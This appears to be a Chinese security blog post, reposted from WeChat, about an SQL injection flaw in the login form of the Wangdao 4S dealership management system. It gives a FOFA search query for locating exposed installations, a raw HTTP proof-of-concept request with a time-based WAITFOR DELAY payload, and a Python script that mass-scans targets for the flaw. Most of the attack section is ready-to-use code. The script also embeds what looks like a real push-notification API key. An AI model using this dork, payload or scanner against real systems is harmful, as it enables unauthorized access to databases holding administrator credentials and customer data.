一、产品简介
王道汽车4S 企业管理系统Q(以下简称“王道4S系统”)是一套专门为汽车销售和维修服务企业开发的管理软件。该系统是博士德软件公司集10余年汽车行业管理软件研发经验之大成,精心打造的最新一代汽车4S企业管理解决方案。
二、漏洞概述
王道汽车4S企业管理系统 登录框用户名接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
三、复现环境
FOFA:
body="PixelsPerInch" && body="AxBorderStyle" && body="DropTarget"
四、漏洞复现
POC
POST / HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0Content-Type: application/x-www-form-urlencoded; charset=utf-8X-MicrosoftAjax: Delta=trueX-Requested-With: XMLHttpRequestConnection: closeScriptManager1=UpdatePanel3|btnLogin&__EVENTTARGET=btnLogin&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=&ddlUserName=&txtUserName=1';WAITFOR DELAY '0:0:5'--&txtPassWord=1&cbBossedBroadcast=on&txtMACAddr=&__ASYNCPOST=true&
延时5秒
SQLmap验证
五、实战复现
先编写自动化POC检测工具
# Wangdao_time_SQL_injection_scan.pyimport requestsfrom requests.packages.urllib3.exceptions import InsecureRequestWarningfrom requests.exceptions import Timeoutimport osimport urllib.parseimport urllib.requestimport reimport timedef sc_send(text, desp='', key='[SENDKEY]'):postdata = urllib.parse.urlencode({'text': text, 'desp': desp}).encode('utf-8')urlserver = f'https://sctapi.ftqq.com/{key}.send'req = urllib.request.Request(urlserver, data=postdata, method='POST')with urllib.request.urlopen(req) as response:result = response.read().decode('utf-8')return resultkey = "SCT202695TeKe1ATgRMke7f7jyrOOkH9GX"def scan_Wangdao_time_SQL_injection(url, proxies, headers, append_to_output):proxies = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080'}headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0','Content-Type': 'application/x-www-form-urlencoded; charset=utf-8','X-MicrosoftAjax': 'Delta=true','X-Requested-With': 'XMLHttpRequest'}if url.endswith("/"):path = ""else:path = ""if not url.startswith('http://') and not url.startswith('https://'):url = 'http://' + urldata = '''ScriptManager1=UpdatePanel3|btnLogin&__EVENTTARGET=btnLogin&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=&ddlUserName=&txtUserName=1';WAITFOR DELAY '0:0:5'--&txtPassWord=1&cbBossedBroadcast=on&txtMACAddr=&__ASYNCPOST=true&'''encodetext = urlappend_to_output("===================================================================", "green")try:expected_time = 5 # 期望的回包时间,单位为秒start_time = time.time()requests.packages.urllib3.disable_warnings(InsecureRequestWarning)req = requests.post(encodetext, data=data, headers=headers, verify=False, timeout=15, proxies=proxies)res = req.textend_time = time.time()response_time = end_time - start_timeif response_time >= expected_time:append_to_output(f"[+] {url} 存在王道汽车4S企业管理系统 SQL注入漏洞!!!!", "red")# self.append_to_output(res, "yellow")else:append_to_output(f"[-] {url} 不存在王道汽车4S企业管理系统 SQL注入漏洞", "green")except Timeout:append_to_output(f"[!] 请求超时,跳过URL: {url}", "yellow")except Exception as e:if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):append_to_output(f"[-] {url} 证书校验错误或者证书被拒绝", "yellow")else:append_to_output(str(e), "yellow")
整理自己企业资产
一把哈拉少
哦吼?老板打电话了,加班了,哎,真是不作死就不会死
你我本无缘,有了洞,我们才有机会成为师徒,陈师傅给你看看慧根呀,我反正被抓走加班了!!!
可以联系微信:Changethe_one,只要你提供目前的现状与学历,陈老师可以免费帮大家做职业规划哟
原文始发于微信公众号(暗影网安实验室):大型作死现场【深夜加班】-王道汽车4S企业管理系统 SQL注入漏洞
